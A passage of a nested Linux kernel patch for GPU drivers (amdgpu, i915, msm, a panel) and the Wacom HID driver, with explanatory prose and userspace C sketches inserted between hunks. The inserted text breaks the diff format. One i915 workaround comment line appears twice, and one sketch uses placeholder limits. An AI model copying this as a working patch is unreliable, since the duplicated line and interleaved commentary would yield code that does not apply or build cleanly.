+ 	REG_UPDATE(MMHUBBUB_SOFT_RESET, DMUIF_SOFT_RESET, 0);
+ 	REG_WRITE(DMCUB_SCRATCH15, dmub->psp_version & 0x001100FF);
+ 	REG_UPDATE_2(DMCUB_CNTL, DMCUB_ENABLE, 1, DMCUB_TRACEPORT_EN, 1);
+diff --git a/drivers/gpu/drm/amd/pm/amdgpu_dpm.c b/drivers/gpu/drm/amd/pm/amdgpu_dpm.c
+index 1b300c569faf5..69b51612c39a5 100644
+--- a/drivers/gpu/drm/amd/pm/amdgpu_dpm.c
++++ b/drivers/gpu/drm/amd/pm/amdgpu_dpm.c
+@@ -36,6 +36,8 @@
+ #define amdgpu_dpm_enable_bapm(adev, e) \
+ 		((adev)->powerplay.pp_funcs->enable_bapm((adev)->powerplay.pp_handle, (e)))
+ 
++#define amdgpu_dpm_is_legacy_dpm(adev) ((adev)->powerplay.pp_handle == (adev))
++
+ int amdgpu_dpm_get_sclk(struct amdgpu_device *adev, bool low)
+ {
+ 	const struct amd_pm_funcs *pp_funcs = adev->powerplay.pp_funcs;
+@@ -1414,15 +1416,24 @@ int amdgpu_dpm_get_smu_prv_buf_details(struct amdgpu_device *adev,
+ 
+ int amdgpu_dpm_is_overdrive_supported(struct amdgpu_device *adev)
+ {
+-	struct pp_hwmgr *hwmgr = adev->powerplay.pp_handle;
+-	struct smu_context *smu = adev->powerplay.pp_handle;
++	if (is_support_sw_smu(adev)) {
++		struct smu_context *smu = adev->powerplay.pp_handle;
+ 
+-	if ((is_support_sw_smu(adev) && smu->od_enabled) ||
+-	    (is_support_sw_smu(adev) && smu->is_apu) ||
+-		(!is_support_sw_smu(adev) && hwmgr->od_enabled))
+-		return true;
++		return (smu->od_enabled || smu->is_apu);
++	} else {
++		struct pp_hwmgr *hwmgr;
+ 
+-	return false;
++		/*
++		 * dpm on some legacy asics doesn't carry the od_enabled member,
++		 * as its pp_handle is cast directly from adev.
++		 */
++		if (amdgpu_dpm_is_legacy_dpm(adev))
++			return false;
++
++		hwmgr = (struct pp_hwmgr *)adev->powerplay.pp_handle;
++
++		return hwmgr->od_enabled;
++	}
+ }
+ 
+ int amdgpu_dpm_set_pp_table(struct amdgpu_device *adev,
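
The overdrive check above now branches on is_support_sw_smu() first, and on the legacy path refuses to dereference pp_handle when it is merely an alias of adev, since legacy dpm never allocated a hwmgr. A sketch of that tagged-handle test with stand-in types:

/* Legacy-handle sketch: on some old ASICs the pp_handle is the device
 * pointer itself, so it must not be cast to a hwmgr.  Types are made up. */
#include <stdbool.h>
#include <stdio.h>

struct hwmgr { bool od_enabled; };
struct device { void *pp_handle; };

#define is_legacy_dpm(dev) ((dev)->pp_handle == (void *)(dev))

static bool overdrive_supported(struct device *dev)
{
	if (is_legacy_dpm(dev))
		return false;			/* no hwmgr to look at */
	return ((struct hwmgr *)dev->pp_handle)->od_enabled;
}

int main(void)
{
	struct hwmgr h = { .od_enabled = true };
	struct device legacy, modern = { .pp_handle = &h };

	legacy.pp_handle = &legacy;		/* handle aliases the device */
	printf("legacy: %d, modern: %d\n",
	       overdrive_supported(&legacy), overdrive_supported(&modern));
	return 0;
}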
+diff --git a/drivers/gpu/drm/bridge/lontium-lt8912b.c b/drivers/gpu/drm/bridge/lontium-lt8912b.c
+index 1b74a913f1b8f..5e419934d2a39 100644
+--- a/drivers/gpu/drm/bridge/lontium-lt8912b.c
++++ b/drivers/gpu/drm/bridge/lontium-lt8912b.c
+@@ -504,7 +504,6 @@ static int lt8912_attach_dsi(struct lt8912 *lt)
+ 	dsi->format = MIPI_DSI_FMT_RGB888;
+ 
+ 	dsi->mode_flags = MIPI_DSI_MODE_VIDEO |
+-			  MIPI_DSI_MODE_VIDEO_BURST |
+ 			  MIPI_DSI_MODE_LPM |
+ 			  MIPI_DSI_MODE_NO_EOT_PACKET;
+ 
+diff --git a/drivers/gpu/drm/i915/display/icl_dsi.c b/drivers/gpu/drm/i915/display/icl_dsi.c
+index c62bb9e2c1743..4d34a24ee7b0d 100644
+--- a/drivers/gpu/drm/i915/display/icl_dsi.c
++++ b/drivers/gpu/drm/i915/display/icl_dsi.c
+@@ -1211,7 +1211,7 @@ static void gen11_dsi_powerup_panel(struct intel_encoder *encoder)
+ 
+ 	/* panel power on related mipi dsi vbt sequences */
+ 	intel_dsi_vbt_exec_sequence(intel_dsi, MIPI_SEQ_POWER_ON);
+-	intel_dsi_msleep(intel_dsi, intel_dsi->panel_on_delay);
++	msleep(intel_dsi->panel_on_delay);
+ 	intel_dsi_vbt_exec_sequence(intel_dsi, MIPI_SEQ_DEASSERT_RESET);
+ 	intel_dsi_vbt_exec_sequence(intel_dsi, MIPI_SEQ_INIT_OTP);
+ 	intel_dsi_vbt_exec_sequence(intel_dsi, MIPI_SEQ_DISPLAY_ON);
+diff --git a/drivers/gpu/drm/i915/display/intel_dsi_vbt.c b/drivers/gpu/drm/i915/display/intel_dsi_vbt.c
+index 2cbc1292ab382..f102c13cb9590 100644
+--- a/drivers/gpu/drm/i915/display/intel_dsi_vbt.c
++++ b/drivers/gpu/drm/i915/display/intel_dsi_vbt.c
+@@ -762,17 +762,6 @@ void intel_dsi_vbt_exec_sequence(struct intel_dsi *intel_dsi,
+ 		gpiod_set_value_cansleep(intel_dsi->gpio_backlight, 0);
+ }
+ 
+-void intel_dsi_msleep(struct intel_dsi *intel_dsi, int msec)
+-{
+-	struct intel_connector *connector = intel_dsi->attached_connector;
+-
+-	/* For v3 VBTs in vid-mode the delays are part of the VBT sequences */
+-	if (is_vid_mode(intel_dsi) && connector->panel.vbt.dsi.seq_version >= 3)
+-		return;
+-
+-	msleep(msec);
+-}
+-
+ void intel_dsi_log_params(struct intel_dsi *intel_dsi)
+ {
+ 	struct drm_i915_private *i915 = to_i915(intel_dsi->base.base.dev);
+diff --git a/drivers/gpu/drm/i915/display/intel_dsi_vbt.h b/drivers/gpu/drm/i915/display/intel_dsi_vbt.h
+index dc642c1fe7efd..468d873fab1ae 100644
+--- a/drivers/gpu/drm/i915/display/intel_dsi_vbt.h
++++ b/drivers/gpu/drm/i915/display/intel_dsi_vbt.h
+@@ -16,7 +16,6 @@ void intel_dsi_vbt_gpio_init(struct intel_dsi *intel_dsi, bool panel_is_on);
+ void intel_dsi_vbt_gpio_cleanup(struct intel_dsi *intel_dsi);
+ void intel_dsi_vbt_exec_sequence(struct intel_dsi *intel_dsi,
+ 				 enum mipi_seq seq_id);
+-void intel_dsi_msleep(struct intel_dsi *intel_dsi, int msec);
+ void intel_dsi_log_params(struct intel_dsi *intel_dsi);
+ 
+ #endif /* __INTEL_DSI_VBT_H__ */
+diff --git a/drivers/gpu/drm/i915/display/skl_scaler.c b/drivers/gpu/drm/i915/display/skl_scaler.c
+index d7390067b7d4c..fe5c47672580b 100644
+--- a/drivers/gpu/drm/i915/display/skl_scaler.c
++++ b/drivers/gpu/drm/i915/display/skl_scaler.c
+@@ -87,6 +87,10 @@ static u16 skl_scaler_calc_phase(int sub, int scale, bool chroma_cosited)
+ #define ICL_MAX_SRC_H 4096
+ #define ICL_MAX_DST_W 5120
+ #define ICL_MAX_DST_H 4096
++#define MTL_MAX_SRC_W 4096
++#define MTL_MAX_SRC_H 8192
++#define MTL_MAX_DST_W 8192
++#define MTL_MAX_DST_H 8192
+ #define SKL_MIN_YUV_420_SRC_W 16
+ #define SKL_MIN_YUV_420_SRC_H 16
+ 
+@@ -103,6 +107,10 @@ skl_update_scaler(struct intel_crtc_state *crtc_state, bool force_detach,
+ 	struct drm_i915_private *dev_priv = to_i915(crtc->base.dev);
+ 	const struct drm_display_mode *adjusted_mode =
+ 		&crtc_state->hw.adjusted_mode;
++	int pipe_src_w = drm_rect_width(&crtc_state->pipe_src);
++	int pipe_src_h = drm_rect_height(&crtc_state->pipe_src);
++	int min_src_w, min_src_h, min_dst_w, min_dst_h;
++	int max_src_w, max_src_h, max_dst_w, max_dst_h;
+ 
+ 	/*
+ 	 * Src coordinates are already rotated by 270 degrees for
+@@ -157,15 +165,33 @@ skl_update_scaler(struct intel_crtc_state *crtc_state, bool force_detach,
+ 		return -EINVAL;
+ 	}
+ 
++	min_src_w = SKL_MIN_SRC_W;
++	min_src_h = SKL_MIN_SRC_H;
++	min_dst_w = SKL_MIN_DST_W;
++	min_dst_h = SKL_MIN_DST_H;
++
++	if (DISPLAY_VER(dev_priv) < 11) {
++		max_src_w = SKL_MAX_SRC_W;
++		max_src_h = SKL_MAX_SRC_H;
++		max_dst_w = SKL_MAX_DST_W;
++		max_dst_h = SKL_MAX_DST_H;
++	} else if (DISPLAY_VER(dev_priv) < 14) {
++		max_src_w = ICL_MAX_SRC_W;
++		max_src_h = ICL_MAX_SRC_H;
++		max_dst_w = ICL_MAX_DST_W;
++		max_dst_h = ICL_MAX_DST_H;
++	} else {
++		max_src_w = MTL_MAX_SRC_W;
++		max_src_h = MTL_MAX_SRC_H;
++		max_dst_w = MTL_MAX_DST_W;
++		max_dst_h = MTL_MAX_DST_H;
++	}
++
+ 	/* range checks */
+-	if (src_w < SKL_MIN_SRC_W || src_h < SKL_MIN_SRC_H ||
+-	    dst_w < SKL_MIN_DST_W || dst_h < SKL_MIN_DST_H ||
+-	    (DISPLAY_VER(dev_priv) >= 11 &&
+-	     (src_w > ICL_MAX_SRC_W || src_h > ICL_MAX_SRC_H ||
+-	      dst_w > ICL_MAX_DST_W || dst_h > ICL_MAX_DST_H)) ||
+-	    (DISPLAY_VER(dev_priv) < 11 &&
+-	     (src_w > SKL_MAX_SRC_W || src_h > SKL_MAX_SRC_H ||
+-	      dst_w > SKL_MAX_DST_W || dst_h > SKL_MAX_DST_H)))	{
++	if (src_w < min_src_w || src_h < min_src_h ||
++	    dst_w < min_dst_w || dst_h < min_dst_h ||
++	    src_w > max_src_w || src_h > max_src_h ||
++	    dst_w > max_dst_w || dst_h > max_dst_h) {
+ 		drm_dbg_kms(&dev_priv->drm,
+ 			    "scaler_user index %u.%u: src %ux%u dst %ux%u "
+ 			    "size is out of scaler range\n",
+@@ -174,6 +200,21 @@ skl_update_scaler(struct intel_crtc_state *crtc_state, bool force_detach,
+ 		return -EINVAL;
+ 	}
+ 
++	/*
++	 * The pipe scaler does not use all the bits of PIPESRC, at least
++	 * on the earlier platforms. So even when we're scaling a plane
++	 * the *pipe* source size must not be too large. For simplicity
++	 * we assume the limits match the scaler source size limits. Might
++	 * not be 100% accurate on all platforms, but good enough for now.
++	 */
++	if (pipe_src_w > max_src_w || pipe_src_h > max_src_h) {
++		drm_dbg_kms(&dev_priv->drm,
++			    "scaler_user index %u.%u: pipe src size %ux%u "
++			    "is out of scaler range\n",
++			    crtc->pipe, scaler_user, pipe_src_w, pipe_src_h);
++		return -EINVAL;
++	}
++
+ 	/* mark this plane as a scaler user in crtc_state */
+ 	scaler_state->scaler_users |= (1 << scaler_user);
+ 	drm_dbg_kms(&dev_priv->drm, "scaler_user index %u.%u: "
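
The scaler range check is restructured: instead of repeating DISPLAY_VER() tests inside one large condition, the min/max limits are chosen once per platform (with new, larger MTL values) and a single comparison follows. A sketch of the table-driven form; the SKL numbers here are placeholders, while the ICL and MTL values mirror the hunk:

/* Table-driven limits sketch: select one set of limits by display
 * version, then do a single range comparison. */
#include <stdbool.h>
#include <stdio.h>

struct scaler_limits { int max_src_w, max_src_h, max_dst_w, max_dst_h; };

static struct scaler_limits limits_for(int display_ver)
{
	if (display_ver < 11)
		return (struct scaler_limits){ 4096, 4096, 4096, 4096 }; /* SKL (placeholder) */
	if (display_ver < 14)
		return (struct scaler_limits){ 5120, 4096, 5120, 4096 }; /* ICL */
	return (struct scaler_limits){ 4096, 8192, 8192, 8192 };	 /* MTL */
}

static bool scaler_in_range(int ver, int sw, int sh, int dw, int dh)
{
	struct scaler_limits l = limits_for(ver);

	return sw <= l.max_src_w && sh <= l.max_src_h &&
	       dw <= l.max_dst_w && dh <= l.max_dst_h;
}

int main(void)
{
	printf("ICL 5120-wide source: %d\n", scaler_in_range(12, 5120, 2160, 4096, 2160));
	printf("SKL 5120-wide source: %d\n", scaler_in_range(9, 5120, 2160, 4096, 2160));
	return 0;
}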
+diff --git a/drivers/gpu/drm/i915/display/vlv_dsi.c b/drivers/gpu/drm/i915/display/vlv_dsi.c
+index 662bdb656aa30..c7270aa58bae5 100644
+--- a/drivers/gpu/drm/i915/display/vlv_dsi.c
++++ b/drivers/gpu/drm/i915/display/vlv_dsi.c
+@@ -783,7 +783,6 @@ static void intel_dsi_pre_enable(struct intel_atomic_state *state,
+ {
+ 	struct intel_dsi *intel_dsi = enc_to_intel_dsi(encoder);
+ 	struct intel_crtc *crtc = to_intel_crtc(pipe_config->uapi.crtc);
+-	struct intel_connector *connector = to_intel_connector(conn_state->connector);
+ 	struct drm_i915_private *dev_priv = to_i915(crtc->base.dev);
+ 	enum pipe pipe = crtc->pipe;
+ 	enum port port;
+@@ -831,21 +830,10 @@ static void intel_dsi_pre_enable(struct intel_atomic_state *state,
+ 	if (!IS_GEMINILAKE(dev_priv))
+ 		intel_dsi_prepare(encoder, pipe_config);
+ 
++	/* Give the panel time to power-on and then deassert its reset */
+ 	intel_dsi_vbt_exec_sequence(intel_dsi, MIPI_SEQ_POWER_ON);
+-
+-	/*
+-	 * Give the panel time to power-on and then deassert its reset.
+-	 * Depending on the VBT MIPI sequences version the deassert-seq
+-	 * may contain the necessary delay, intel_dsi_msleep() will skip
+-	 * the delay in that case. If there is no deassert-seq, then an
+-	 * unconditional msleep is used to give the panel time to power-on.
+-	 */
+-	if (connector->panel.vbt.dsi.sequence[MIPI_SEQ_DEASSERT_RESET]) {
+-		intel_dsi_msleep(intel_dsi, intel_dsi->panel_on_delay);
+-		intel_dsi_vbt_exec_sequence(intel_dsi, MIPI_SEQ_DEASSERT_RESET);
+-	} else {
+-		msleep(intel_dsi->panel_on_delay);
+-	}
++	msleep(intel_dsi->panel_on_delay);
++	intel_dsi_vbt_exec_sequence(intel_dsi, MIPI_SEQ_DEASSERT_RESET);
+ 
+ 	if (IS_GEMINILAKE(dev_priv)) {
+ 		glk_cold_boot = glk_dsi_enable_io(encoder);
+@@ -879,7 +867,7 @@ static void intel_dsi_pre_enable(struct intel_atomic_state *state,
+ 		msleep(20); /* XXX */
+ 		for_each_dsi_port(port, intel_dsi->ports)
+ 			dpi_send_cmd(intel_dsi, TURN_ON, false, port);
+-		intel_dsi_msleep(intel_dsi, 100);
++		msleep(100);
+ 
+ 		intel_dsi_vbt_exec_sequence(intel_dsi, MIPI_SEQ_DISPLAY_ON);
+ 
+@@ -1007,7 +995,7 @@ static void intel_dsi_post_disable(struct intel_atomic_state *state,
+ 	/* Assert reset */
+ 	intel_dsi_vbt_exec_sequence(intel_dsi, MIPI_SEQ_ASSERT_RESET);
+ 
+-	intel_dsi_msleep(intel_dsi, intel_dsi->panel_off_delay);
++	msleep(intel_dsi->panel_off_delay);
+ 	intel_dsi_vbt_exec_sequence(intel_dsi, MIPI_SEQ_POWER_OFF);
+ 
+ 	intel_dsi->panel_power_off_time = ktime_get_boottime();
+diff --git a/drivers/gpu/drm/i915/gt/intel_gt_regs.h b/drivers/gpu/drm/i915/gt/intel_gt_regs.h
+index 9758b0b635601..1d96c36f9efc2 100644
+--- a/drivers/gpu/drm/i915/gt/intel_gt_regs.h
++++ b/drivers/gpu/drm/i915/gt/intel_gt_regs.h
+@@ -1135,6 +1135,8 @@
+ #define   ENABLE_SMALLPL			REG_BIT(15)
+ #define   SC_DISABLE_POWER_OPTIMIZATION_EBB	REG_BIT(9)
+ #define   GEN11_SAMPLER_ENABLE_HEADLESS_MSG	REG_BIT(5)
++#define   MTL_DISABLE_SAMPLER_SC_OOO		REG_BIT(3)
++#define   GEN11_INDIRECT_STATE_BASE_ADDR_OVERRIDE	REG_BIT(0)
+ 
+ #define GEN9_HALF_SLICE_CHICKEN7		MCR_REG(0xe194)
+ #define   DG2_DISABLE_ROUND_ENABLE_ALLOW_FOR_SSLA	REG_BIT(15)
+@@ -1161,7 +1163,9 @@
+ #define   THREAD_EX_ARB_MODE_RR_AFTER_DEP	REG_FIELD_PREP(THREAD_EX_ARB_MODE, 0x2)
+ 
+ #define HSW_ROW_CHICKEN3			_MMIO(0xe49c)
++#define GEN9_ROW_CHICKEN3			MCR_REG(0xe49c)
+ #define   HSW_ROW_CHICKEN3_L3_GLOBAL_ATOMICS_DISABLE	(1 << 6)
++#define   MTL_DISABLE_FIX_FOR_EOT_FLUSH		REG_BIT(9)
+ 
+ #define GEN8_ROW_CHICKEN			MCR_REG(0xe4f0)
+ #define   FLOW_CONTROL_ENABLE			REG_BIT(15)
+diff --git a/drivers/gpu/drm/i915/gt/intel_workarounds.c b/drivers/gpu/drm/i915/gt/intel_workarounds.c
+index e13052c5dae19..620071efb2fc1 100644
+--- a/drivers/gpu/drm/i915/gt/intel_workarounds.c
++++ b/drivers/gpu/drm/i915/gt/intel_workarounds.c
+@@ -3035,6 +3035,39 @@ general_render_compute_wa_init(struct intel_engine_cs *engine, struct i915_wa_li
+ 
+ 	add_render_compute_tuning_settings(i915, wal);
+ 
++	if (GRAPHICS_VER(i915) >= 11) {
++		/* This is not a Wa (although referred to as
++		/* This is not a Wa (although referred to as
++		 * WaSetInidrectStateOverride in places); it allows
++		 * the BindlessSamplerStateBaseAddress to have their
++		 * border color relative to DynamicStateBaseAddress
++		 * rather than BindlessSamplerStateBaseAddress.
++		 *
++		 * Otherwise SAMPLER_STATE border colors have to be
++		 * copied in multiple heaps (DynamicStateBaseAddress &
++		 * BindlessSamplerStateBaseAddress)
++		 *
++		 * BSpec: 46052
++		 */
++		wa_mcr_masked_en(wal,
++				 GEN10_SAMPLER_MODE,
++				 GEN11_INDIRECT_STATE_BASE_ADDR_OVERRIDE);
++	}
++
++	if (IS_MTL_GRAPHICS_STEP(i915, M, STEP_B0, STEP_FOREVER) ||
++	    IS_MTL_GRAPHICS_STEP(i915, P, STEP_B0, STEP_FOREVER))
++		/* Wa_14017856879 */
++		wa_mcr_masked_en(wal, GEN9_ROW_CHICKEN3, MTL_DISABLE_FIX_FOR_EOT_FLUSH);
++
++	if (IS_MTL_GRAPHICS_STEP(i915, M, STEP_A0, STEP_B0) ||
++	    IS_MTL_GRAPHICS_STEP(i915, P, STEP_A0, STEP_B0))
++		/*
++		 * Wa_14017066071
++		 * Wa_14017654203
++		 */
++		wa_mcr_masked_en(wal, GEN10_SAMPLER_MODE,
++				 MTL_DISABLE_SAMPLER_SC_OOO);
++
+ 	if (IS_MTL_GRAPHICS_STEP(i915, M, STEP_A0, STEP_B0) ||
+ 	    IS_MTL_GRAPHICS_STEP(i915, P, STEP_A0, STEP_B0) ||
+ 	    IS_PONTEVECCHIO(i915) ||
+diff --git a/drivers/gpu/drm/i915/i915_pci.c b/drivers/gpu/drm/i915/i915_pci.c
+index 4fada7ebe8d82..36cc4fc87c48c 100644
+--- a/drivers/gpu/drm/i915/i915_pci.c
++++ b/drivers/gpu/drm/i915/i915_pci.c
+@@ -1133,6 +1133,8 @@ static const struct intel_gt_definition xelpmp_extra_gt[] = {
+ static const struct intel_device_info mtl_info = {
+ 	XE_HP_FEATURES,
+ 	XE_LPDP_FEATURES,
++	.__runtime.cpu_transcoder_mask = BIT(TRANSCODER_A) | BIT(TRANSCODER_B) |
++			       BIT(TRANSCODER_C) | BIT(TRANSCODER_D),
+ 	/*
+ 	 * Real graphics IP version will be obtained from hardware GMD_ID
+ 	 * register.  Value provided here is just for sanity checking.
+diff --git a/drivers/gpu/drm/i915/i915_reg.h b/drivers/gpu/drm/i915/i915_reg.h
+index 4f84cda3f9b5e..bbbbeb3f47816 100644
+--- a/drivers/gpu/drm/i915/i915_reg.h
++++ b/drivers/gpu/drm/i915/i915_reg.h
+@@ -7612,8 +7612,8 @@ enum skl_power_gate {
+ 
+ #define _PLANE_CSC_RY_GY_1(pipe)	_PIPE(pipe, _PLANE_CSC_RY_GY_1_A, \
+ 					      _PLANE_CSC_RY_GY_1_B)
+-#define _PLANE_CSC_RY_GY_2(pipe)	_PIPE(pipe, _PLANE_INPUT_CSC_RY_GY_2_A, \
+-					      _PLANE_INPUT_CSC_RY_GY_2_B)
++#define _PLANE_CSC_RY_GY_2(pipe)	_PIPE(pipe, _PLANE_CSC_RY_GY_2_A, \
++					      _PLANE_CSC_RY_GY_2_B)
+ #define PLANE_CSC_COEFF(pipe, plane, index)	_MMIO_PLANE(plane, \
+ 							    _PLANE_CSC_RY_GY_1(pipe) +  (index) * 4, \
+ 							    _PLANE_CSC_RY_GY_2(pipe) + (index) * 4)
+diff --git a/drivers/gpu/drm/msm/adreno/adreno_device.c b/drivers/gpu/drm/msm/adreno/adreno_device.c
+index cd009d56d35d5..ed1e0c650bb1a 100644
+--- a/drivers/gpu/drm/msm/adreno/adreno_device.c
++++ b/drivers/gpu/drm/msm/adreno/adreno_device.c
+@@ -440,20 +440,21 @@ struct msm_gpu *adreno_load_gpu(struct drm_device *dev)
+ 
+ 	ret = pm_runtime_get_sync(&pdev->dev);
+ 	if (ret < 0) {
+-		pm_runtime_put_sync(&pdev->dev);
++		pm_runtime_put_noidle(&pdev->dev);
+ 		DRM_DEV_ERROR(dev->dev, "Couldn't power up the GPU: %d\n", ret);
+-		return NULL;
++		goto err_disable_rpm;
+ 	}
+ 
+ 	mutex_lock(&gpu->lock);
+ 	ret = msm_gpu_hw_init(gpu);
+ 	mutex_unlock(&gpu->lock);
+-	pm_runtime_put_autosuspend(&pdev->dev);
+ 	if (ret) {
+ 		DRM_DEV_ERROR(dev->dev, "gpu hw init failed: %d\n", ret);
+-		return NULL;
++		goto err_put_rpm;
+ 	}
+ 
++	pm_runtime_put_autosuspend(&pdev->dev);
++
+ #ifdef CONFIG_DEBUG_FS
+ 	if (gpu->funcs->debugfs_init) {
+ 		gpu->funcs->debugfs_init(gpu, dev->primary);
+@@ -462,6 +463,13 @@ struct msm_gpu *adreno_load_gpu(struct drm_device *dev)
+ #endif
+ 
+ 	return gpu;
++
++err_put_rpm:
++	pm_runtime_put_sync_suspend(&pdev->dev);
++err_disable_rpm:
++	pm_runtime_disable(&pdev->dev);
++
++	return NULL;
+ }
+ 
+ static int find_chipid(struct device *dev, struct adreno_rev *rev)
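
The adreno fix rebalances runtime PM on every error path: a failed pm_runtime_get_sync() still increments the usage count, so it is dropped with a _noidle put, and a later hw-init failure unwinds through labels in reverse order. A simplified userspace model of that bookkeeping (not the real pm_runtime API):

/* Runtime-PM unwind sketch: the usage count must return to zero on every
 * path, including the one where the "get" itself fails. */
#include <stdio.h>

static int usage;			/* stands in for the rpm usage count */

static int rpm_get(int fail)		{ usage++; return fail ? -5 : 0; }
static void rpm_put_noidle(void)	{ usage--; }
static void rpm_put_sync_suspend(void)	{ usage--; }
static void rpm_disable(void)		{ printf("rpm disabled\n"); }

static int load_gpu(int get_fails, int hw_init_fails)
{
	int ret = rpm_get(get_fails);

	if (ret < 0) {
		rpm_put_noidle();	/* count bumped even on failure */
		goto err_disable_rpm;
	}
	if (hw_init_fails) {
		ret = -5;
		goto err_put_rpm;
	}
	rpm_put_noidle();		/* stands in for put_autosuspend */
	return 0;

err_put_rpm:
	rpm_put_sync_suspend();
err_disable_rpm:
	rpm_disable();
	return ret;
}

int main(void)
{
	load_gpu(0, 1);
	printf("usage count balanced: %s\n", usage == 0 ? "yes" : "no");
	return 0;
}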
+diff --git a/drivers/gpu/drm/msm/msm_drv.c b/drivers/gpu/drm/msm/msm_drv.c
+index ee2f60b6f09b3..0987ea1af8b44 100644
+--- a/drivers/gpu/drm/msm/msm_drv.c
++++ b/drivers/gpu/drm/msm/msm_drv.c
+@@ -50,6 +50,8 @@
+ #define MSM_VERSION_MINOR	9
+ #define MSM_VERSION_PATCHLEVEL	0
+ 
++static void msm_deinit_vram(struct drm_device *ddev);
++
+ static const struct drm_mode_config_funcs mode_config_funcs = {
+ 	.fb_create = msm_framebuffer_create,
+ 	.output_poll_changed = drm_fb_helper_output_poll_changed,
+@@ -241,7 +243,8 @@ static int msm_drm_uninit(struct device *dev)
+ 		msm_fbdev_free(ddev);
+ #endif
+ 
+-	msm_disp_snapshot_destroy(ddev);
++	if (kms)
++		msm_disp_snapshot_destroy(ddev);
+ 
+ 	drm_mode_config_cleanup(ddev);
+ 
+@@ -249,19 +252,16 @@ static int msm_drm_uninit(struct device *dev)
+ 		drm_bridge_remove(priv->bridges[i]);
+ 	priv->num_bridges = 0;
+ 
+-	pm_runtime_get_sync(dev);
+-	msm_irq_uninstall(ddev);
+-	pm_runtime_put_sync(dev);
++	if (kms) {
++		pm_runtime_get_sync(dev);
++		msm_irq_uninstall(ddev);
++		pm_runtime_put_sync(dev);
++	}
+ 
+ 	if (kms && kms->funcs)
+ 		kms->funcs->destroy(kms);
+ 
+-	if (priv->vram.paddr) {
+-		unsigned long attrs = DMA_ATTR_NO_KERNEL_MAPPING;
+-		drm_mm_takedown(&priv->vram.mm);
+-		dma_free_attrs(dev, priv->vram.size, NULL,
+-			       priv->vram.paddr, attrs);
+-	}
++	msm_deinit_vram(ddev);
+ 
+ 	component_unbind_all(dev, ddev);
+ 
+@@ -399,6 +399,19 @@ static int msm_init_vram(struct drm_device *dev)
+ 	return ret;
+ }
+ 
++static void msm_deinit_vram(struct drm_device *ddev)
++{
++	struct msm_drm_private *priv = ddev->dev_private;
++	unsigned long attrs = DMA_ATTR_NO_KERNEL_MAPPING;
++
++	if (!priv->vram.paddr)
++		return;
++
++	drm_mm_takedown(&priv->vram.mm);
++	dma_free_attrs(ddev->dev, priv->vram.size, NULL, priv->vram.paddr,
++			attrs);
++}
++
+ static int msm_drm_init(struct device *dev, const struct drm_driver *drv)
+ {
+ 	struct msm_drm_private *priv = dev_get_drvdata(dev);
+@@ -418,6 +431,10 @@ static int msm_drm_init(struct device *dev, const struct drm_driver *drv)
+ 	priv->dev = ddev;
+ 
+ 	priv->wq = alloc_ordered_workqueue("msm", 0);
++	if (!priv->wq) {
++		ret = -ENOMEM;
++		goto err_put_dev;
++	}
+ 
+ 	INIT_LIST_HEAD(&priv->objects);
+ 	mutex_init(&priv->obj_lock);
+@@ -440,12 +457,12 @@ static int msm_drm_init(struct device *dev, const struct drm_driver *drv)
+ 
+ 	ret = msm_init_vram(ddev);
+ 	if (ret)
+-		return ret;
++		goto err_cleanup_mode_config;
+ 
+ 	/* Bind all our sub-components: */
+ 	ret = component_bind_all(dev, ddev);
+ 	if (ret)
+-		return ret;
++		goto err_deinit_vram;
+ 
+ 	dma_set_max_seg_size(dev, UINT_MAX);
+ 
+@@ -540,6 +557,17 @@ static int msm_drm_init(struct device *dev, const struct drm_driver *drv)
+ 
+ err_msm_uninit:
+ 	msm_drm_uninit(dev);
++
++	return ret;
++
++err_deinit_vram:
++	msm_deinit_vram(ddev);
++err_cleanup_mode_config:
++	drm_mode_config_cleanup(ddev);
++	destroy_workqueue(priv->wq);
++err_put_dev:
++	drm_dev_put(ddev);
++
+ 	return ret;
+ }
+ 
+diff --git a/drivers/gpu/drm/panel/panel-orisetech-otm8009a.c b/drivers/gpu/drm/panel/panel-orisetech-otm8009a.c
+index b4729a94c34a8..898b892f11439 100644
+--- a/drivers/gpu/drm/panel/panel-orisetech-otm8009a.c
++++ b/drivers/gpu/drm/panel/panel-orisetech-otm8009a.c
+@@ -471,7 +471,7 @@ static int otm8009a_probe(struct mipi_dsi_device *dsi)
+ 		       DRM_MODE_CONNECTOR_DSI);
+ 
+ 	ctx->bl_dev = devm_backlight_device_register(dev, dev_name(dev),
+-						     dsi->host->dev, ctx,
++						     dev, ctx,
+ 						     &otm8009a_backlight_ops,
+ 						     NULL);
+ 	if (IS_ERR(ctx->bl_dev)) {
+diff --git a/drivers/hid/wacom_wac.c b/drivers/hid/wacom_wac.c
+index 9312d611db8e5..0c6a82c665c1d 100644
+--- a/drivers/hid/wacom_wac.c
++++ b/drivers/hid/wacom_wac.c
+@@ -1308,6 +1308,9 @@ static void wacom_intuos_pro2_bt_pen(struct wacom_wac *wacom)
+ 
+ 	struct input_dev *pen_input = wacom->pen_input;
+ 	unsigned char *data = wacom->data;
++	int number_of_valid_frames = 0;
++	int time_interval = 15000000;
++	ktime_t time_packet_received = ktime_get();
+ 	int i;
+ 
+ 	if (wacom->features.type == INTUOSP2_BT ||
+@@ -1328,12 +1331,30 @@ static void wacom_intuos_pro2_bt_pen(struct wacom_wac *wacom)
+ 		wacom->id[0] |= (wacom->serial[0] >> 32) & 0xFFFFF;
+ 	}
+ 
++	/* count the number of valid frames */
+ 	for (i = 0; i < pen_frames; i++) {
+ 		unsigned char *frame = &data[i*pen_frame_len + 1];
+ 		bool valid = frame[0] & 0x80;
++
++		if (valid)
++			number_of_valid_frames++;
++	}
++
++	if (number_of_valid_frames) {
++		if (wacom->hid_data.time_delayed)
++			time_interval = ktime_get() - wacom->hid_data.time_delayed;
++		time_interval /= number_of_valid_frames;
++		wacom->hid_data.time_delayed = time_packet_received;
++	}
++
++	for (i = 0; i < number_of_valid_frames; i++) {
++		unsigned char *frame = &data[i*pen_frame_len + 1];
++		bool valid = frame[0] & 0x80;
+ 		bool prox = frame[0] & 0x40;
+ 		bool range = frame[0] & 0x20;
+ 		bool invert = frame[0] & 0x10;
++		int frames_number_reversed = number_of_valid_frames - i - 1;
++		int event_timestamp = time_packet_received - frames_number_reversed * time_interval;
+ 
+ 		if (!valid)
+ 			continue;
+@@ -1346,6 +1367,7 @@ static void wacom_intuos_pro2_bt_pen(struct wacom_wac *wacom)
+ 			wacom->tool[0] = 0;
+ 			wacom->id[0] = 0;
+ 			wacom->serial[0] = 0;
++			wacom->hid_data.time_delayed = 0;
+ 			return;
+ 		}
+ 
+@@ -1382,6 +1404,7 @@ static void wacom_intuos_pro2_bt_pen(struct wacom_wac *wacom)
+ 						 get_unaligned_le16(&frame[11]));
